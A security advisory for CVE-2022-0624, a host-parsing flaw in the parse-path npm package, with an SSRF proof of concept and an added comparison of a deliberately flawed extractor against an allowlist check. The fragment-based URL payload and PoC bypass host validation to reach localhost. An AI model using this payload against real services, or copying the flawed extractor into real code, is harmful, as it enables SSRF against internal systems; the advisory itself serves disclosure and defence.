Headline
CVE-2022-0624: Authorization Bypass Through User-Controlled Key in parse-path
Authorization Bypass Through User-Controlled Key in GitHub repository ionicabizau/parse-path prior to 5.0.0.
Description
parse-path does not identify the correct resource. When parsing the URL http://127.0.0.1#@example.com, parse-path reports the host/resource as example.com, whereas the actual resource is 127.0.0.1: everything after the # is the fragment, so @example.com is not part of the authority.
Proof of Concept
SSRF PoC
const parsePath = require("parse-path");
const axios = require("axios");
const PAYLOAD = "http://127.0.0.1#@example.com";
const parsedData = parsePath(PAYLOAD);
// Blacklist a few domains; the check passes because parse-path
// reports example.com as the resource.
if (parsedData.resource !== "127.0.0.1") {
    console.log("BYPASSED...");
    // axios parses the URL itself and connects to 127.0.0.1.
    axios.get(PAYLOAD)
        .then(function (resp) {
            console.log("Sent the request to " + resp.request._currentUrl);
        })
        .catch(function (error) {
            console.log("Sent the request to " + error.request._currentUrl);
        });
}
OUTPUT:
BYPASSED...
Sent the request to http://127.0.0.1/
Impact
An attacker can bypass host-validation checks, which can lead to SSRF, open redirect and other similar vulnerabilities. The above PoC bypasses the SSRF check because axios loads 127.0.0.1 rather than example.com.
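The parser disagreement described above, shown as an added example that is not part of the original advisory and is not parse-path's code. naiveHost is a hypothetical extractor that reproduces this class of mistake, checkedHost is one way to validate with the WHATWG URL parser built into Node.js, and the allowlist and sample URLs are constructed.

```javascript
// Added example; function names and ALLOWED_HOSTS are hypothetical.

// Naive host extraction: searches the whole string for the userinfo
// separator, so an "@" inside the fragment is mistaken for "user@host".
function naiveHost(input) {
  let rest = input.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "");
  const at = rest.lastIndexOf("@");
  if (at !== -1) rest = rest.slice(at + 1);
  return rest.split(/[\/?#:]/)[0];
}

// Hardened check: the WHATWG URL parser splits off the fragment before it
// looks at the authority, and the result is compared against an allowlist
// instead of a blacklist of known-bad hosts.
const ALLOWED_HOSTS = new Set(["example.com"]); // constructed allowlist

function checkedHost(input) {
  let url;
  try {
    url = new URL(input);
  } catch {
    return null; // unparseable input is rejected
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  return ALLOWED_HOSTS.has(url.hostname) ? url.hostname : null;
}

// Constructed sample inputs; the first is the URL from the advisory.
const SAMPLES = [
  "http://127.0.0.1#@example.com",
  "http://example.com/path#frag",
  "http://user@example.com/",
];

function compare() {
  return SAMPLES.map((input) => ({
    input,
    naive: naiveHost(input),
    checked: checkedHost(input),
  }));
}

console.log(compare());
```

The request should then be built from the parsed URL object rather than the raw string, so that the validator and the HTTP client act on the same host.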
Related news
GHSA-3j8f-xvm3-ffx4: Authorization Bypass in parse-path